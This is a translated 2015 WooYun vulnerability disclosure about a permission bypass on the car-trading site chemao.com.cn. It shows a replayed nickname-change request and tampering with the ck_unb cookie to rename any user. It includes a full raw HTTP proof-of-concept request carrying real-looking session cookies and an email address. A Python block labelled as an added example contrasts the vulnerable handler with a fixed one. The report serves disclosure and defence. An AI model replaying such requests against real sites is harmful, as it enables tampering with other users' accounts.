
Vulnerability Summary (followers: 24)

Defect ID: wooyun-2015-0134223

Title: Logic permission bypass in a feature of Chemao (车猫网)

Vendor: dongdalou.com

Author: 天地不仁 以万物为刍狗

Submitted: 2015-08-15 15:11

Fixed: 2015-10-01 13:42

Published: 2015-10-01 13:42

Vulnerability type: Unauthorized access / permission bypass

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-08-15: Details sent to the vendor, awaiting vendor response
2015-08-17: Vendor confirmed; details disclosed to the vendor only
2015-08-27: Details disclosed to core white hats and domain experts
2015-09-06: Details disclosed to regular white hats
2015-09-16: Details disclosed to intern white hats
2015-10-01: Details disclosed to the public

Brief description:

One cut leaves you poor, one cut makes you rich, one cut and you are wearing sackcloth; a madman sells, a madman buys, and another madman is still waiting.

Detailed description:

About the nickname field: since I have already changed mine, I no longer have a screenshot of the notice, but what it says is that the nickname can only be changed once. After it has been changed it cannot be changed again, and the edit button disappears as well. This can be bypassed, however.
For example, my profile currently looks like this:

0.png


There is no edit button next to the nickname. Yet if you capture the request sent when the nickname is changed the first time and then replay it, the nickname can be changed again. For example, I will now change my nickname to wooyun:

1.png


Then refresh the page:

2.png


It has been changed successfully. Combined with the previous vulnerability, modifying the ck_unb parameter makes it possible to change the nickname of every user.
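The two defects described above (the one-time rule enforced only by hiding the UI button, and the user identity taken from the client-editable ck_unb cookie) can be modelled side by side. This is an added example, not code from the original report or from the site: the handler names, the User/USERS fixtures and the second user id 90001 are assumptions.

```python
# Added example (not from the original report): a minimal model of the
# change_nick handler in its vulnerable form and in a hardened form.
# User, USERS, the handler names and uid 90001 are assumptions.
from dataclasses import dataclass

@dataclass
class User:
    uid: int
    nick: str
    nick_changed: bool = False  # server-side record of the one-time change

# Constructed sample accounts standing in for the site's user table.
USERS = {71752: User(71752, "old_nick"), 90001: User(90001, "someone_else")}

def change_nick_vulnerable(request):
    """Identity comes from the ck_unb cookie (client-controlled) and the
    one-time rule exists only in the UI, so replays and foreign ids work."""
    uid = int(request["cookies"]["ck_unb"])
    user = USERS[uid]
    user.nick = request["form"]["nick"]        # no nick_changed check
    return {"ok": True, "uid": uid}

def change_nick_fixed(request, session):
    """Identity comes from the server-side session set at login; the
    one-time rule is checked against the stored record, not the UI."""
    uid = session["uid"]                       # ck_unb is ignored entirely
    user = USERS[uid]
    new_nick = request["form"]["nick"].strip()
    if user.nick_changed:
        return {"ok": False, "error": "nickname may only be changed once"}
    if not (1 <= len(new_nick) <= 20):
        return {"ok": False, "error": "invalid nickname"}
    user.nick = new_nick
    user.nick_changed = True
    return {"ok": True, "uid": uid}

def replay_demo():
    """Sends the same request twice, plus one with a foreign ck_unb,
    to each handler and reports which calls were accepted."""
    req = {"cookies": {"ck_unb": "71752"}, "form": {"nick": "wooyun"}}
    foreign = {"cookies": {"ck_unb": "90001"}, "form": {"nick": "wooyun"}}
    session = {"uid": 71752}                   # established at login
    r = {}
    r["vuln_first"] = change_nick_vulnerable(req)["ok"]
    r["vuln_replay"] = change_nick_vulnerable(req)["ok"]
    r["vuln_foreign"] = change_nick_vulnerable(foreign)["ok"]
    USERS[71752].nick, USERS[71752].nick_changed = "old_nick", False  # reset
    USERS[90001].nick = "someone_else"
    r["fixed_first"] = change_nick_fixed(req, session)["ok"]
    r["fixed_replay"] = change_nick_fixed(req, session)["ok"]
    r["fixed_foreign"] = change_nick_fixed(foreign, session)["ok"]
    r["foreign_nick"] = USERS[90001].nick
    return r
```

Only the first call to the hardened handler succeeds; the replay is refused by the stored nick_changed flag, and the foreign ck_unb value never reaches the identity decision.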

Proof of vulnerability:

POST /index.php?app=user&act=change_nick HTTP/1.1
Host: www.chemao.com.cn
Content-Length: 12
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.chemao.com.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.3635.47 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.chemao.com.cn/user-edit.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: globalCookieCity=%BD%AD%CB%D5; sguid=%7B%22_type_%22%3A%22string%22%2C%22_val_%22%3A%2212bb104e-1644-10eb-1eb5-194011f21227%22%7D; sgload=%7B%22_type_%22%3A%22number%22%2C%22_val_%22%3A1%7D; sgps=%7B%22_type_%22%3A%22json%22%2C%22_val_%22%3A%22%5B%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22date-scorce-1%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22date-scorce-2%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22date-scorce-3%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22data-ms%5C%22%2C%5C%22val%5C%22%3A%5C%22mechat%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22onclick%5C%22%2C%5C%22val%5C%22%3A%5C%22openEcDialog()%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22class%5C%22%2C%5C%22val%5C%22%3A%5C%22cert-form-btn%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22data-type%5C%22%2C%5C%22val%5C%22%3A%5C%22confirm%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22class%5C%22%2C%5C%22val%5C%22%3A%5C%22MECHAT_FLOAT_CHAT%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22onclick%5C%22%2C%5C%22val%5C%22%3A%5C%22mechatClick()%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22confirm%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22onclick%5C%22%2C%5C%22val%5C%22%3A%5C%22openEcDialog()%3B%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22show_tel%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22credit-btn%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22sell-car-submit%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22class%5C%22%2C%5C%22val%5C%22%3A%5C%22submitBtn%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22byk-form-btn%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22submitForm%5C%22%7D%5D%22%7D; __ag_cm_=1439555742507; _hjIncludedInSample=0; _hjUserId=548edf3a-d575-4a1d-b8fc-8fb7908192f6; 
sgpth=%7B%22_type_%22%3A%22json%22%2C%22_val_%22%3A%22%5B%7B%5C%22time%5C%22%3A1439555752764%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuLw%3D%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439555755418%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439555760771%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439555783171%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL2luZGV4LnBocD9hcHA9dXNlciZhY3Q9b3JkZXJfYnV5ZXI%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439555899537%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556168980%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL2luZGV4LnBocD9hcHA9dXNlciZhY3Q9b3JkZXJfYnV5ZXI%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556170760%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556178612%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556191045%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZm9sbG93Lmh0bWw%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556192708%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcmVsZWFzZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556193975%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL2luZGV4LnBocD9hcHA9dXNlciZhY3Q9b3JkZXJfYnV5ZXI%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556195441%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556199854%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556203230%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556209682%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5ja
GVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556221376%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL2luZGV4LnBocA%3D%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556236036%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556237942%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556240500%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL2luZGV4LnBocD9hcHA9dXNlciZhY3Q9b3JkZXJfYnV5ZXI%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556242448%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556254684%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556512681%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL2luZGV4LnBocD9hcHA9dXNlciZhY3Q9b3JkZXJfYnV5ZXI%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556514284%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556526342%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556776779%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556851112%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL21hcmtldC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556856863%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3Nob3ctaWQtMTIyNTA0OC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556878006%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556880341%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZm9sbG93Lmh0bWw%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556881636%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZ
XItcmVsZWFzZS5odG1s%5C%22%7D%5D%22%7D; _gat=1; redirectURL=%252Findex.php%253Fapp%253Duser%2526act%253Dedit; Hm_lvt_996dd03d99962cc3d2411df00b3a3e38=1439555742; Hm_lpvt_996dd03d99962cc3d2411df00b3a3e38=1439558188; _ga=GA1.3.9953835.1439555742; ag_fid=OxxEh37D397Pdc0F; uuid=21f3be7999692c886cc7e805ed462cee; FC_ID=28b1bad7619f5b89aa21651c31709bee64b90d27; ck_unb=71752; ck__nk_=177712604%40qq.com; ck__lg_=177712604%40qq.com; ck_user_type=0
nick=wooyun

Fix recommendation:

Copyright notice: when reposting, please credit the source: 天地不仁 以万物为刍狗@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-08-17 13:40

Vendor reply:

Thanks to the author!

Latest status:

None yet

